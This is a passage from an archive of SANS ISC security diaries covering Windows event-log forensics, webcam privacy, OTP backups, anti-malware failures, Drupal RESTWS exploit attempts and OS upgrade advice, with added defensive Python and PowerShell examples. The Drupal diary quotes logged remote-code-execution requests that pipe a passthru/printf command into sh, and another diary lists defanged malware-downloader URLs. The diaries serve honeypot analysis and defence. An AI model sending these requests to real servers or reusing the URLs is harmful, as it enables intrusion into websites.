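    $xml  = [xml]$Event.ToXml()
    $data = @{}
    foreach ($d in $xml.Event.EventData.Data) {
        if ($d.Name) { $data[$d.Name] = $d.'#text' }
    }
    return $data
}

# 7045 "A service was installed": flag names and paths like the diary's sample
# (random all-letter names, binaries in TEMP or dropped straight into %SYSTEMROOT%).
function Get-ServiceInstallEvents {
    param([datetime]$StartTime = (Get-Date).AddDays(-7))
    Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7045; StartTime = $StartTime } -ErrorAction SilentlyContinue |
        ForEach-Object {
            $f = ConvertFrom-EventData $_
            [pscustomobject]@{
                TimeCreated = $_.TimeCreated
                ServiceName = $f['ServiceName']
                ImagePath   = $f['ImagePath']
                StartType   = $f['StartType']
                Account     = $f['AccountName']
                Suspicious  = ($f['ServiceName'] -match '^[A-Za-z]{12,}$') -or
                              ($f['ImagePath']   -match '\\Temp\\|^%SYSTEMROOT%\\[^\\]+\.exe')
            }
        }
}

# 4624 logons in a time window, optionally restricted to given logon types,
# using the named fields LogonType, TargetUserName, IpAddress, WorkstationName.
function Get-LogonEvents {
    param(
        [datetime]$StartTime = (Get-Date).AddDays(-7),
        [datetime]$EndTime   = (Get-Date),
        [int[]]$LogonType
    )
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4624; StartTime = $StartTime; EndTime = $EndTime } -ErrorAction SilentlyContinue |
        ForEach-Object {
            $f = ConvertFrom-EventData $_
            [pscustomobject]@{
                TimeCreated = $_.TimeCreated
                LogonType   = [int]$f['LogonType']
                Account     = '{0}\{1}' -f $f['TargetDomainName'], $f['TargetUserName']
                IpAddress   = $f['IpAddress']
                Workstation = $f['WorkstationName']
                AuthPackage = $f['AuthenticationPackageName']
            }
        } |
        Where-Object { -not $LogonType -or $LogonType -contains $_.LogonType }
}

# For each suspicious service install, list the network (type 3) logons in the
# preceding minutes: the correlation the diary does by hand with starttime/endtime.
function Find-ServiceInstallsWithPriorNetworkLogon {
    param([int]$WindowMinutes = 10)
    Get-ServiceInstallEvents | Where-Object Suspicious | ForEach-Object {
        $svc    = $_
        $logons = Get-LogonEvents -StartTime $svc.TimeCreated.AddMinutes(-$WindowMinutes) `
                                  -EndTime $svc.TimeCreated -LogonType 3
        [pscustomobject]@{
            ServiceTime = $svc.TimeCreated
            ServiceName = $svc.ServiceName
            ImagePath   = $svc.ImagePath
            PriorLogons = ($logons | ForEach-Object {
                               '{0} from {1} at {2}' -f $_.Account, $_.IpAddress, $_.TimeCreated
                           }) -join '; '
        }
    }
}

# Logon-type summary, equivalent to the diary's Group-Object on ReplacementStrings[8].
function Get-LogonTypeSummary {
    param([datetime]$StartTime = (Get-Date).AddDays(-7))
    Get-LogonEvents -StartTime $StartTime | Group-Object LogonType |
        Select-Object @{ Name = 'LogonType'; Expression = { [int]$_.Name } }, Count |
        Sort-Object LogonType
}

Find-ServiceInstallsWithPriorNetworkLogon | Format-List
Get-LogonTypeSummary | Format-Table -AutoSize
```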

 

 

 

[i] https://isc.sans.edu/forums/diary/Windows+Events+log+for+IRForensics+Part+1/21493/

1 Comments

Published: 2016-09-19

Does it Matter If You Cover Your Webcam?

During security conferences, laptops with tape covering the webcam have certainly been a common sight. But recently, covering webcams has become somewhat of a "main-stream phenomenon", after Mark Zuckerberg was sighted with a covered webcam [1], and even the FBI director suggests that people cover their cameras [2].

Laptops are often used in private spaces, and an attacker, with access to the camera, is expected to be able to spy on the user of the laptop. Attacks like this have happened, and even indicator lights can be disabled in some of these attacks. However, the camera is not the only sensor included in modern laptops and mobile devices that can be used to "listen in." Most notably, mobile devices usually have several microphones, that are far more difficult to disable. The article about Mark Zuckerberg above shows how he also uses tape to cover up the microphone of the laptop. First of all, covering the microphone with electrical tape will not reduce the microphone's ability to detect sound by much. Secondly, most laptops use multiple microphones. Disabling all microphones is difficult, and will most likely void your warranty if you outright remove them.

The webcam in most laptops is designed for video conferencing. As a result, it points at the user's face, not at the keyboard, which would likely be more interesting. I have not seen a built in "tilt pan" camera yet. The resolution is also somewhat limited (1080p usually) and prevents the camera from seeing notes taped to a wall behind it. Access to the microphone (and of course to the keyboard via a good old-fashioned keystroke logger) can be a lot more useful.

Many mobile devices do use gyroscopes to detect motion. In some cases, these sensors were found to be sensitive enough to record conversations by detecting the vibration caused by sound. Microphones in nearby mobile devices have also been found to be sensitive enough to record keystrokes on nearby PC keyboards.

As far as cameras go, cameras in video conferencing systems, which often include pan/tilt and zoom have been used to look in on conference rooms. These cameras are often not covered up.

So what should you do?

- Keep your camera covered. There are some little "sliding covers" that you can buy, but a piece of electrical tape will work (add some paper to the back of it right over the camera to avoid glue residue in case you use it).
- In particular for sliding covers, make sure the frame doesn't cover the LED indicator. You should be able to see if the camera is on while the cover is open
- For systems like video conferencing cameras, point them in a safe direction (wall) while not in use
- Sadly, I haven't seen laptops with physical switches for microphones. If you cover microphones, make sure you test that the cover works (maybe some foam will work) and get the schematic for your laptop to know where all the microphones are located.
- Don't forget your mobile devices! 
- and if you want real privacy: Leave the electronics in a different room and power it down.

Any other tips I missed?

[1] http://www.theverge.com/2016/6/21/11995032/mark-zuckerberg-webcam-tape-photo
[2] http://thehill.com/policy/national-security/295933-fbi-director-cover-up-your-webcam

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

9 Comments

Published: 2016-09-18

Windows Events log for IR/Forensics ,Part 1

In the time of incidents, Windows Event logs provide a plenty of useful information for the Incident responder.As you know Windows can generate thousands of events in few minutes ,in this diary I will talk about some of the most useful events and in the next diary I would discuss how to use PowerShell to search for them .

Here are some of the most useful events for forensics/incident response:

Event ID   Description                                             Log Name
4624       Successful logon                                        Security
4625       Failed logon                                            Security
4776       Successful/failed account authentication                Security
4720       A user account was created                              Security
4732       A member was added to a security-enabled local group    Security
4728       A member was added to a security-enabled global group   Security
7030       Service creation errors                                 System
7045       Service creation (a service was installed)              System

One useful piece of information that the successful/failed logon events provide is how the user or process logged on (the Logon Type), but Windows records it only as a number. Here is a list of the logon types and their meaning:

Logon Type   Explanation
2            Interactive logon via the console
3            Network logon: a user or computer logged on to this computer from the network
4            Batch logon (e.g. scheduled tasks)
5            Windows service logon
7            Credentials used to unlock the screen
8            Network logon with cleartext credentials
9            Different credentials used than the logged-on user (e.g. RunAs /netonly)
10           Remote interactive logon (RDP)
11           Cached credentials used to log on
12           Cached remote interactive logon
13           Cached unlock (similar to logon type 7)

In the next diary I will show some examples of how to use PowerShell to search the Windows events of a compromised system.
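As an added example (not part of the diary, and not the PowerShell the author announces for part 2), here is a small Python triage routine built on the two tables above. The events are constructed for the example, in the shape you get after exporting Security and System events to JSON or CSV; the field names (IpAddress, TargetUserName, MemberName, ImagePath) follow the Windows event XML, and the failure threshold is an assumption.

```python
"""Triage exported Windows events using the event IDs and logon types above.

The events below are constructed for this example; real ones would be exported
from the Security and System logs (e.g. wevtutil or Get-WinEvent -> JSON)."""
from collections import Counter

# Event IDs from the first table: (log name, meaning)
EVENT_IDS = {
    4624: ("Security", "successful logon"),
    4625: ("Security", "failed logon"),
    4776: ("Security", "account authentication (success or failure)"),
    4720: ("Security", "user account created"),
    4732: ("Security", "member added to security-enabled local group"),
    4728: ("Security", "member added to security-enabled global group"),
    7030: ("System", "service creation error"),
    7045: ("System", "service installed"),
}

# Logon types from the second table
LOGON_TYPES = {
    2: "interactive (console)",
    3: "network",
    4: "batch",
    5: "service",
    7: "unlock",
    8: "network cleartext",
    9: "new credentials (different from logged-on user)",
    10: "remote interactive (RDP)",
    11: "cached interactive",
    12: "cached remote interactive",
    13: "cached unlock",
}

# Constructed sample: a password-guessing run from 10.0.0.99 that ends in an RDP
# logon, followed by a new account, a group membership change and a new service.
SAMPLE_EVENTS = [
    *[{"EventID": 4625, "LogonType": 3, "TargetUserName": "administrator",
       "IpAddress": "10.0.0.99"} for _ in range(6)],
    {"EventID": 4624, "LogonType": 10, "TargetUserName": "administrator",
     "IpAddress": "10.0.0.99"},
    {"EventID": 4624, "LogonType": 2, "TargetUserName": "alice", "IpAddress": "-"},
    {"EventID": 4720, "TargetUserName": "svc_backup", "SubjectUserName": "administrator"},
    {"EventID": 4732, "TargetUserName": "Administrators", "MemberName": "svc_backup"},
    {"EventID": 7045, "ServiceName": "WinDefHelper",
     "ImagePath": r"C:\Windows\Temp\wdh.exe"},
]


def describe_event(ev):
    """Human-readable line for one event, resolving the numeric logon type."""
    log, meaning = EVENT_IDS.get(ev["EventID"], ("?", "undocumented event ID"))
    text = f"{ev['EventID']} [{log}] {meaning}"
    if "LogonType" in ev:
        lt = ev["LogonType"]
        text += f", logon type {lt}: {LOGON_TYPES.get(lt, 'undocumented')}"
    return text


def failed_logon_sources(events, threshold=5):
    """Source addresses with at least `threshold` 4625 events (threshold is an assumption)."""
    counts = Counter(ev.get("IpAddress", "-") for ev in events if ev["EventID"] == 4625)
    return {ip: n for ip, n in counts.items() if n >= threshold}


def triage(events, threshold=5):
    """Findings: failure bursts, a success from the same source, new accounts that
    were granted group membership, and service installs."""
    findings = []
    for ip, n in failed_logon_sources(events, threshold).items():
        findings.append(f"{n} failed logons (4625) from {ip}")
        for ev in events:
            if ev["EventID"] == 4624 and ev.get("IpAddress") == ip:
                findings.append(
                    f"successful logon (4624) from {ip} as {ev['TargetUserName']} "
                    f"via {LOGON_TYPES.get(ev.get('LogonType'), '?')}")
    new_accounts = {ev["TargetUserName"] for ev in events if ev["EventID"] == 4720}
    for ev in events:
        if ev["EventID"] in (4728, 4732) and ev.get("MemberName") in new_accounts:
            findings.append(f"new account {ev['MemberName']} added to group "
                            f"{ev['TargetUserName']} ({ev['EventID']})")
        elif ev["EventID"] == 7045:
            findings.append(f"service installed (7045): {ev['ServiceName']} -> {ev['ImagePath']}")
    return findings


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(describe_event(ev))
    print("\nFindings:")
    for finding in triage(SAMPLE_EVENTS):
        print(" -", finding)
```

The point of the sample is the sequence, not any single event: a burst of 4625s followed by a 4624 with logon type 10 from the same address, then 4720/4732 and 7045, is the chain you want to surface first when thousands of events are on the table.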

 

 

3 Comments

Published: 2016-09-17

Multiple Cisco Products affected by IKEv1 Vulnerability

Cisco released an advisory (CVE-2016-6415) regarding a vulnerability in IKEv1 that affects Cisco IOS, IOS XE and IOS XR software and could allow an unauthenticated remote attacker to retrieve memory contents, leading to the disclosure of confidential information.

Note: "Cisco will release software updates that address this vulnerability. There are no workarounds that address this vulnerability."[1] The list of affected products is available in the advisory. Cisco rates this vulnerability High.

[1] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160916-ikev1

-----------
Guy Bruneau IPSS Inc.
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

6 Comments

Published: 2016-09-15

In Need of a OTP Manager Soon?

Even if everybody agrees that passwords are a weak way to protect access to sensitive or private information, they remain to this day the default method implemented by many online services. A password, as complex as it may be, is easy to steal or leak. Tools like Mimikatz or memory scrapers[1] are common today. For a while now, major players on the Internet have implemented two-factor authentication (2FA) or multi-factor authentication (MFA). As a reminder, this authentication mechanism is based on a combination of:
- something "you know" (a password, a PIN or a passphrase)
- something "you have" (a token, a smart card)
- something "you are" (your fingerprint, retina, palm, …)

From a cost and ease-of-implementation point of view, the most common combination remains a password plus a temporary code, or "OTP". There are commercial solutions based on physical tokens, but today, with the explosion of smartphones, Google Authenticator[2] and compatible applications have become the most used platform. Once the application is installed, every time you activate the OTP feature on a compatible website, you scan a QR code and that's it!
An alternative way (not available on all sites) is to type in the Base32 or HEX key, like on the ISC website:

When available, I always enable OTP on my online accounts (Twitter, GitHub, Apple, Dropbox, … but also on my own resources like my blog or my private ownCloud). On my iPhone, I'm using the 2FA app because it has a simple GUI and provides an Apple Watch version (it is so convenient to have tokens right on your wrist!). But my collection of tokens is constantly growing:

I can't imagine losing all those tokens! We have used password managers for a while (well, I hope you do), but will we need an "OTP manager" soon? The other question is: how to safely keep track of and back up your tokens? They are available in your pocket, but a smartphone is easy to lose, get stolen or break. Most websites propose a procedure to recover your access if you lose your token, but there isn't a single procedure: some propose recovery codes (that must also be safely stored somewhere), others email or SMS codes (and, guess what, usually the same phone is used to receive the recovery SMS).

Here are some best practices:

  • Always read the recovery procedure carefully
  • Copy / print the backup codes
  • Link your account to a mobile phone (to receive SMS codes)
  • Link your account to a valid and long-lived email address (not the one provided by your employer)

Personally, what I do:

  • When the QR code is displayed on the website, I take a screenshot of the code and rename the picture QR_websitename.png
  • When the Base32 or HEX key is provided, I write it in a text file KEY_websitename.txt
  • Files are zipped, encrypted with my PGP key and stored offline
  • Link the account to a different SIM / phone number that can be used in any old-fashioned phone

Note that some 2FA apps, like Authy, offer a backup solution (usually in the cloud; it's up to you to trust it or not). To conclude, OTP passwords are a good way to protect your accounts, but have a good recovery procedure in place to avoid losing control of them. And you? How do you address this issue? Share your input!
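Added example, not from the diary: what the QR code and the Base32 key actually contain, and why a copy of either one is a complete backup of a token. The QR code encodes an otpauth:// URI; the code below parses such a URI and computes the RFC 6238 TOTP from the Base32 secret with the Python standard library only. The URI is constructed for the example, and its secret is the Base32 form of the RFC 6238 test key "12345678901234567890", so the codes can be checked against the RFC's own test vectors.

```python
"""Regenerate TOTP codes from a backed-up Base32 key or otpauth:// URI (RFC 6238).

Standard library only. The URI below is constructed for this example; the secret
is the Base32 form of the RFC 6238 test key "12345678901234567890"."""
import base64
import hashlib
import hmac
import struct
import time
import urllib.parse

# Constructed: what a QR code for an ISC-style account would encode (not a real account).
SAMPLE_URI = ("otpauth://totp/ISC:handler%40example.org"
              "?secret=GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ&issuer=ISC&digits=6&period=30")


def parse_otpauth(uri):
    """Extract the parameters an authenticator app stores when it scans the QR code."""
    u = urllib.parse.urlparse(uri)
    if u.scheme != "otpauth" or u.netloc != "totp":
        raise ValueError("not a TOTP otpauth URI")
    q = urllib.parse.parse_qs(u.query)
    return {
        "label": urllib.parse.unquote(u.path.lstrip("/")),
        "secret": q["secret"][0],
        "digits": int(q.get("digits", ["6"])[0]),
        "period": int(q.get("period", ["30"])[0]),
        "algorithm": q.get("algorithm", ["SHA1"])[0].lower(),
    }


def totp(secret_b32, for_time, digits=6, period=30, algorithm="sha1"):
    """RFC 6238: HOTP (RFC 4226) over the time counter floor(unix_time / period)."""
    cleaned = secret_b32.strip().replace(" ", "")
    cleaned += "=" * (-len(cleaned) % 8)          # sites often omit Base32 padding
    key = base64.b32decode(cleaned, casefold=True)
    counter = int(for_time) // period
    mac = hmac.new(key, struct.pack(">Q", counter), getattr(hashlib, algorithm)).digest()
    offset = mac[-1] & 0x0F                         # dynamic truncation (RFC 4226 5.3)
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def code_from_uri(uri, for_time=None):
    """Current (or given-time) code for a backed-up otpauth URI."""
    p = parse_otpauth(uri)
    when = time.time() if for_time is None else for_time
    return totp(p["secret"], when, p["digits"], p["period"], p["algorithm"])


if __name__ == "__main__":
    print(parse_otpauth(SAMPLE_URI)["label"], code_from_uri(SAMPLE_URI))
```

This is also the reason the screenshot and the text file deserve the PGP encryption the diary applies to them: whoever reads the secret can produce every future code, so an offline backup of a token has exactly the sensitivity of the password it is supposed to strengthen.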

[1] https://blog.blechschmidt.saarland/memory-recovery/
[2] https://support.google.com/accounts/answer/1066447

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

5 Comments

Published: 2016-09-15

Is "2 out of 3" good enough for Anti-Malware?

One of my morning rituals is to take the last few malware samples I received in any of my inboxes and run them in a virtual machine to see if there is anything new. To be honest: There isn't much new that we haven't already written about. The sample is usually a zipped VBScript file that will download and run ransomware. But that isn't the only constant. The other constant is the inability of anti-malware to protect your system from these consistent attacks.

The virtual machine runs a fully patched Windows 10 install, and home-user grade anti-malware. I would consider it a "well configured" average home user system.

This morning, for example, I tried these three samples:

924936fb9f562dc08556bf0677a5d15c813eebde  SCAN_20160915_241418570.zip
c29dd0d1fe36b3891d685171683635c442d84c8d  SCAN_20160915_3640961765775.zip
6213e371567b4620064933efa43e5ffdba455c65  SCAN_20160915_894622558880029.zip

They all arrived in similar emails with a subject of "SCAN" . 

If you are paying attention to malware, you have probably seen e-mails like this for years, with various attachments.

Two of these samples were nicely detected by my anti-malware solution, and I wasn't even able to copy them to my virtual machine. But the third one, which isn't substantially different, made it past whatever signature was used to detect these generic JavaScript downloaders.

Virustotal shows that some name-brand anti-malware solutions do not detect this particular sample:

https://www.virustotal.com/en/file/8acb71453b9759a64eea060949ad87bae3d6f070b04daf2f70ed124b1a905399/analysis/
https://www.virustotal.com/en/file/f732887b200563bfdd89f516fc30139ea21e8adbd3280df3436c289bc154383a/analysis/
https://www.virustotal.com/en/file/a9b4a38e515ee10e1dc8eda13ac9abd8c11c0eece4ac1cb1c746015d17ff5a0c/analysis/

It also shows that all of these samples were rather "fresh" in that Virustotal had received them about 30 minutes ago, so around the time I had received them.

Even if your anti-malware solution doesn't detect the downloader, there is still a chance that it will detect the malware that is downloaded by the JavaScript. This often leads to a false sense of security: you will see, often multiple times, popups that your anti-malware solution did remove malicious code from your system. But these downloaders can be rather persistent. One sample I looked at yesterday took about 15 minutes, and about a dozen "malware found" popups, until it finally downloaded a version of Locky that was not detected, and I ended up with another encrypted system.

So what can you do?

  • The less malware reaches the user, the better. Filter as much on mail servers and proxies as you can using generic filters ("zipped VBScripts" and the like; we talked about this before).
  • Once you notice a possible infection, NEVER trust anti-malware to clean your system. It is probably best to shut down the system as soon as you notice "malware found" popups. This way, you MAY prevent the final successful install, and you may be able to save some of your files from being encrypted.
  • Just like you should not rely on anti-malware: Blocklists of bad URLs and the like are just as bad (ours included). They will help you in hindsight to figure out who got infected yesterday (or an hour ago if they are good), but they will not consistently prevent exploitation.

For example, here are the URLs that I think were used in the undetected sample (I didn't do a full analysis):

(spaces added to protect readers.)

bigfishcasting .com/ afdIJGY8766gyu?YJRTHAigKa=sLUfGQkQRhO
delicefilm .com /afdIJGY8766gyu?YJRTHAigKa=sLUfGQkQRhO (this one has some reasonable recognition as a bad URL)
keratin .sk/ afdIJGY8766gyu?YJRTHAigKa=sLUfGQkQRhO

The issue with anti-malware missing the downloader, and then hoping that the downloaded malware will be detected, isn't new. It goes back at least to the famous "WMF" incident more than 10 years ago, when anti-virus was suggested as a mitigation for the vulnerability even though it didn't detect actual exploitation, only the additional malware downloaded via the exploit. 10+ years later... not much has changed. We are still making it too easy for the bad guys.
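As an added example of the "generic filter" idea (not the author's setup, and not the filter any particular mail server ships), the function below inspects a zipped attachment in memory and flags the script types these downloaders arrive as, double extensions such as .pdf.js, encrypted entries that cannot be scanned, and nested archives. The archives it checks are constructed in the example, and the extension lists are assumptions you would tune for your own environment.

```python
"""Generic attachment filter: flag zipped scripts before they reach a user.

The archives below are constructed in memory for this example; the extension
lists are assumptions to tune for your environment."""
import io
import zipfile

# Script/executable types commonly zipped by e-mail downloaders (assumption)
SCRIPT_EXTENSIONS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta",
                     ".ps1", ".cmd", ".bat", ".exe", ".scr", ".pif", ".jar"}
# Document types used as the decoy half of a double extension (assumption)
DECOY_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg"}


def inspect_zip(data):
    """Return the reasons an archive should be quarantined (empty list = pass)."""
    reasons = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return ["not a valid zip archive"]
    for info in zf.infolist():
        if info.is_dir():
            continue
        name = info.filename.rsplit("/", 1)[-1]
        parts = name.lower().split(".")
        ext = "." + parts[-1] if len(parts) > 1 else ""
        if info.flag_bits & 0x1:                      # general-purpose bit 0: encrypted
            reasons.append(f"{name}: encrypted entry (cannot be scanned)")
        if ext in SCRIPT_EXTENSIONS:
            reasons.append(f"{name}: script/executable inside archive ({ext})")
        if len(parts) > 2 and "." + parts[-2] in DECOY_EXTENSIONS and ext in SCRIPT_EXTENSIONS:
            reasons.append(f"{name}: double extension masquerading as .{parts[-2]}")
        if ext == ".zip":
            reasons.append(f"{name}: nested archive")
    return reasons


def make_zip(entries):
    """Build an in-memory zip from {name: bytes} (constructed test data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed samples, named after the "SCAN_..." mails described above
MALICIOUS_ZIP = make_zip({
    "SCAN_20160915_241418570.pdf.js": b"var sh = new ActiveXObject('WScript.Shell');",
})
BENIGN_ZIP = make_zip({"report/scan.pdf": b"%PDF-1.4 ..."})

if __name__ == "__main__":
    for label, blob in (("malicious", MALICIOUS_ZIP), ("benign", BENIGN_ZIP)):
        verdict = inspect_zip(blob)
        print(label, "->", "QUARANTINE" if verdict else "pass", verdict)
```

A check like this knows nothing about the sample's signature, which is the point: it holds the third sample to the same standard as the two that were detected, and it does so on the relay, before a user can double-click anything.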

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

8 Comments

Published: 2016-09-14

Exploit Attempts for Drupal RESTWS 7.x Module Vulnerability

Attackers usually don't have to worry much about Drupal administrators applying patches. The majority of exploit attempts I see in our honeypots use pretty ancient vulnerabilities. So I was happy to see a script kiddie go the extra mile and use a vulnerability released in July of this year [1] [2].

The vulnerability itself is very straightforward. The attacker can send arbitrary PHP code that will be executed on the server. No special encoding beyond URL encoding appears to be required.

Here is the exploit string as found in my logs:

GET /?q=taxonomy_vocabulary//passthru/printf+%22printf%5C040%5C047%5C134%5C060%5C066%5C061%5C134%5C061%5C060%5C065%5C134%5C061%5C061%5C066%5C134%5C061%5C061%5C062%5C134%5C061%5C061%5C066%5C134%5C061%5C062%5C060%5C134%5C061%5C060%5C062%5C134%5C061%5C062%5C065%5C134%5C061%5C066%5C062%5C134%5C061%5C062%5C063%5C047%22%7Csh+

Decoding this leads to:

"printf\040\047\134\060\066\061\134\061\060\065\134\061\061\066\134\061\061\062\134\061\061\066\134\061\062\060\134\061\060\062\134\061\062\065\134\061\066\062\134\061\062\063\047"|sh

which is itself octal encoded a second time, and would just print the string "1ENJNPBUrS": a canary to identify vulnerable systems rather than a payload.

So far today, our honeypot received 44 attempts from 16 different IPs. Exploit attempts go back to July, just after the vulnerability was announced. Earlier versions use a slightly different test:

GET /?q=taxonomy_vocabulary/XuMWvA8KTq/passthru/echo%20ktKPt14N9p HTTP/1.1

So they skip the octal/URL encoding part.
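Added example (not part of the diary): a decoder that takes either logged request form above, URL-decodes the passthru argument and emulates what the probe's printf/echo pipeline would print, one layer at a time, so the canary string can be pulled out of honeypot logs automatically and matched against the response the attacker expects. The two request lines are the ones quoted above; nothing else is assumed.

```python
"""Decode the RESTWS passthru probes above: URL decoding, then the printf octal layers.

Only the two request lines quoted in the diary are used as input."""
import re
import urllib.parse

OCTAL_ESCAPE = re.compile(r"\\([0-7]{1,3})")
# printf "<fmt>" or printf '<fmt>', optionally piped into sh
PRINTF_CMD = re.compile(r"""^printf\s+(?P<q>["'])(?P<fmt>.*)(?P=q)\s*(?P<pipe>\|\s*sh)?$""", re.S)
ECHO_CMD = re.compile(r"^echo\s+(?P<arg>\S+)$")

REQUESTS = [
    # first form seen in the logs (path only, as quoted above)
    "/?q=taxonomy_vocabulary//passthru/printf+%22printf%5C040%5C047%5C134%5C060%5C066%5C061"
    "%5C134%5C061%5C060%5C065%5C134%5C061%5C061%5C066%5C134%5C061%5C061%5C062%5C134%5C061"
    "%5C061%5C066%5C134%5C061%5C062%5C060%5C134%5C061%5C060%5C062%5C134%5C061%5C062%5C065"
    "%5C134%5C061%5C066%5C062%5C134%5C061%5C062%5C063%5C047%22%7Csh+",
    # earlier form (full request line, as quoted above)
    "GET /?q=taxonomy_vocabulary/XuMWvA8KTq/passthru/echo%20ktKPt14N9p HTTP/1.1",
]


def decode_octal(s):
    """Apply printf's \\NNN octal escapes, i.e. what one printf invocation prints."""
    return OCTAL_ESCAPE.sub(lambda m: chr(int(m.group(1), 8)), s)


def emulate_probe(command, max_layers=5):
    """Emulate what sh would print for these simple printf/echo probes, unwrapping
    each 'printf ... | sh' layer until a plain command remains."""
    cmd = command.strip()
    for _ in range(max_layers):
        m = ECHO_CMD.match(cmd)
        if m:
            return m.group("arg")
        m = PRINTF_CMD.match(cmd)
        if not m:
            raise ValueError(f"unsupported probe command: {cmd!r}")
        output = decode_octal(m.group("fmt"))
        if not m.group("pipe"):
            return output
        cmd = output.strip()          # the decoded text is itself the next command
    raise ValueError("too many nested layers")


def probe_canary(request):
    """URL-decode a logged request (path or full request line) and return the string
    the attacker expects to see echoed back, or None if there is no passthru call."""
    path = request.split()[1] if request.startswith("GET ") else request.split()[0]
    decoded = urllib.parse.unquote_plus(path)
    marker = "/passthru/"
    if marker not in decoded:
        return None
    return emulate_probe(decoded.split(marker, 1)[1])


if __name__ == "__main__":
    for req in REQUESTS:
        print(probe_canary(req), "<-", req[:60] + "...")
```

The first request decodes in two steps: the outer printf turns the \NNN sequences into a second command, printf '\061\105...\123', and only that second printf produces the visible 1ENJNPBUrS. A scanner that finds the canary in the HTTP response knows the site executes what it is given; the same emulation lets a defender confirm which logged requests were such tests rather than payload delivery.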

I used Bing's IP address search to check some of the IP addresses attacking the honeypot (for example, try a Bing search for "ip:117.240.207.43", but don't click on the result: the site is likely compromised). Most of the IPs appear to be running Drupal sites and are likely exploited and used to scan for more victims.

In my quick sampling, I didn't find any obvious malicious content on these sites. I would have expected some advertisement or maybe even malware, but maybe they are still building out their network.

[1] https://www.mehmetince.net/exploit/drupal-restws-module-7x-remote-php-code-execution
[2] https://www.drupal.org/node/2765567

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

0 Comments

Published: 2016-09-13

Microsoft Patch Tuesday Analysis

The Microsoft Patch Tuesday updates are out, our analysis is here:
https://isc.sans.edu/mspatchdays.html?viewday=2016-09-13

If you consume these using an API, the link for that is here:  https://isc.sans.edu/api/getmspatchday/2016-09-13
(or if you prefer json https://isc.sans.edu/api/getmspatchday/2016-09-13?json )

===============
Rob VandenBrink
Compugen

2 Comments

Published: 2016-09-13

Apple iOS 10 and 10.0.1 Released

On top of today being Patch Tuesday, Apple has released iOS 10 sometime today as well. They also released 10.0.1, with not a lot of detail behind that release (maybe something was missed?).

Security details for 10.0 : https://support.apple.com/en-ca/HT207143
Security details for 10.0.1: https://support.apple.com/en-ca/HT207145 (an almost empty page)

Highlights are:

MiTM attacks on Apple Updates
Autocorrect pulling sensitive data from cache (again)
Issues with Certificate Trust in Mail app allows MiTM
Airprint Temp file sanitization
SMS directory exposed to malicious apps

 

None of these Apple or Microsoft updates are what you'd call "small" - let's hope we don't break the internet today (just kidding, I think).

Happy Patching everyone!

===============

Rob VandenBrink
Compugen

1 Comment

Published: 2016-09-13

If it's Free, YOU are the Product

This is a commonly used phrase, usually when describing free products on the internet (often social media sites).

When my wife asked me to convert a PDF to a DOCX file, I thought I'd test this proverb in a slightly different way.  I googled "convert PDF DOC", and tried the first group of "free" online converters.

Of the ones that are actually free, I took the resultant DOC file and pulled it apart, first just by unzipping it, then in much more detail using some of the tools on Lenny Zeltser's cheat sheet page on analyzing malicious documents: https://zeltser.com/analyzing-malicious-documents/.  At this point I think you know where I'm going.

Yes, 3 of the first 5 on the list converted to doc files that contained <gasp> malware - Angler variants all of them.  So an "older" kit, but an exploit all the same. 

So I guess it's true, you are the product! 

Oh, and my wife's request?  I just opened the PDF in Word 2013 and did a "save as".  Some of the graphics were lost, but everything she needed came through just fine!

===============
Rob VandenBrink
Compugen

5 Comments

Published: 2016-09-11

Getting Ready for macOS Sierra: Upgrade Securely

Downloadable PDF with screen shots

Apple is expected to release the next version of its operating system on or around September 20th, 2016 [1]. The current version of OS X, 10.11, also known as "El Capitan", has been updated several times with various bug fixes. Currently, you should be running 10.11.6. It is possible that when Apple releases "Sierra", another bug fix and security update will be released for "El Capitan".

To find out which version of OS X you are running, select "About This Mac" from the Apple menu in the upper left-hand corner.

We will cover the upgrade process only at this point. Most users will receive macOS Sierra as an Upgrade and not install it from scratch. But I bet some of the tips here apply to regular installs as well. To make this guide as generic as possible, I used a plain install of OS X El Capitan without any significant adjustments (I swapped backgrounds for a plain blue one to make the screen shots simpler).

I will not cover features that remained the same (e.g. FileVault).

The initial upgrade via the App Store is simple, and there are no options to choose. You download and install macOS Sierra and reboot your system once you are done. We start this guide after the first log-in after the upgrade.

Please only update via the App Store. Do not download macOS Sierra from any other sources. Make sure to make a full back up before you initiate the update.

If multiple users use a system, then each user has to follow the same procedure.

iCloud Credentials

After logging in, you are asked for iCloud credentials. There is an option to skip this step, but I opted for entering iCloud credentials. Many of the privacy issues with OS X are related to iCloud. But at the same time, many features are linked to iCloud. I doubt many users will disable iCloud.

iCloud Keychain

Next, you will be asked to set up iCloud Keychain. I opted against this. The iCloud Keychain will synchronize your OS X keychain across devices. You may still use the keychain locally without synchronization. According to Apple, the keychain is encrypted before it is uploaded to the cloud [2]. But anybody with access to your iCloud password will be able to access your keychain and with that, all passwords stored in your keychain. Please make sure to use a strong password and enable two-factor authentication before enabling the iCloud Keychain. Apple requires that you set-up a “Security Code” when setting up the iCloud Keychain.

iCloud Shared “Document” and “Desktop” Folder

During your first login, you are asked if you would like to store files from the “Documents” and “Desktop” folder on your iCloud drive. I opted out of this option. This feature may expose files to iCloud that you are not willing (or authorized) to share on cloud-based services.

Siri

